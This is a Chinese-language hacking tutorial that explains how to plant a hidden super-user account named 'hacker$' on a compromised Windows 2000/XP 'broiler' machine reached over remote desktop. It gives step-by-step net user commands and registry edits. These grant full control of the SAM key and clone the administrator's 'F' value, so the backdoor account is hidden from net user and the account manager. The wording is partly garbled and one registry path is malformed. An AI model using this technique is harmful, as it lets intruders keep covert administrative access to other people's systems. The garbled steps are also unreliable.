一、如何在图形界面建立隐躲的超级用户
图形界面下适用原地或开3389终端效力的肉鸡上.上面我提到的那位作者说的办法很好,但是较为繁杂,还要用到psu.exe(让程序以系统用户身份运行的程序),假如在肉鸡上的话还要上传psu.exe.我说的这个办法将没有用到psu.exe这个程序.因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe.XP中regedit.exe和regedt32.exe实为一个程序,改正键值的权限时在右键中点“权限”来改正.对regedit.exe我想大家都很熟习,但却没有能对注册表的项键设置权限,而regedt32.exe最大的优点就是可以对注册表的项键设置权限.NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权检查到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限.这样就可以对SAM键内的信息进行读写了了.细致步聚如下:
1、假定我们是以超级用户administrator登录到开有终端效力的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开端/运行中输入:regedt32.exe并回车来运行regedt32.exe.
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator参加,并设置权限为“完全控制”.这里需要阐明一下:最好是添加你登录的帐户或帐户所在的组,切莫改正原有的帐户或组,否则将会带来一系列没有必要的问题.等隐躲超级用户建好以,再来这里将你添加的帐户删除即可.
4、再点“开端”→“运行”并输入“regedit.exe”回车,发动注册表编辑器regedit.exe.打开键:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事原辨别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键“F”的值复制,并掩盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg兼并.
6、在命令行下执行net user hacker$ /del将用户hacker$删除:
net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将改正好的hacker.reg导入注册表即可
8、到此,隐躲的超级用户hacker$已经建好了,然后关关regedit.exe.在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回本来的样子(只要删除添加的帐户administrator即可).
9、注意:隐躲的超级用户建好后,在帐户管理器看没有到hacker$这个用户,在命令行用“net user”命令也看没有到,但是超级用户建立以后,就没有能再改密码了,假如用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐躲的超级用户了,而且没有能删除.
